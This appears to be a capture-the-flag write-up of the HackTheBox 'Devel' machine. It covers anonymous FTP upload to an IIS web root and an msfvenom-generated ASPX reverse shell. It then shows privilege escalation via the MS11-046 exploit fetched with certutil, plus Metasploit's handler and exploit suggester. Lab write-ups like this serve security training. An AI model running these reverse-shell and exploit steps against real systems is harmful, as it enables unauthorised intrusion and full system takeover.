HackTheBox Devel Writeup




Windows Privilege Escalation

Windows Privilege Escalation with Metasploit



Run the nmapAutomator.sh script to automate all of the process of recon/enumeration.

We can see there is only 2 ports open port 21 & port 80

port 21 allowed anonymous ftp login & port 80 Microsoft IIS httpd 7.5, lets first browse port 80

Nothing look interesting lets move to port 21 and login as anonymous

welcome.png lets browse it we get same image and FTP server seems to be in a same web server. Lets see if we can upload a file and can be open in a web server

If we browse our test.txt file in web we can see output. So we can access our file through web Exploitation

Lets get Reverse Shell by uploading our shellcode using ftp, lets generate our shellcode Msfvenom command "msfvenom -p windows/shell_reverse_tcp -f aspx LHOST= LPORT=1234 -o rs.aspx". To upload our shellcode we can use put command and start netcat listener.

Here we got Reverse shell if we try to get access user directory we get denied.Since we have low priv lets go for Privilege escalation to get full access. To get system information we have to run "systeminfo" command and here we got some juicy information

Windows Privilege Escalation

If we google "6.1.7600 n/a build 7600 privilege escalation" we can see some exploits lets try first one “Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)” and in description it shows how to compile the exploit

here we can compile exploit and give name anything what we want to give

Since we don’t have full access so we can make temp directory in "C:\Users\Public" and upload our exploit. To upload our exploit we have to run Python SimpleHTTPServer on port 80 in our attacker machine and in victim we can use “powershell” or “certutil” command to upload our exploit.

We have uploaded our exploit lets execute it and get "nt authority\system" full access

User flag is in "c:\Users\babis\Desktop" directory and Root flag is in "c:\Users\Administrator\Desktop" directory

Windows Privilege Escalation with Metasploit

We can get Privilege Escalation with Metasploit also first generate meterpreter shellcode and upload using “certutil” command

now we can start our listener in metasploit using "exploit/multi/handler"

after executing our exploit in victim machine we get meterpreter shell. Since we don’t have full access we can use "post/multi/recon/local_exploit_suggester" for Privilege Escalation it will suggest us possible exploit that we can use to get full access as shown in the below image

Leave a Reply

Your email address will not be published. Required fields are marked *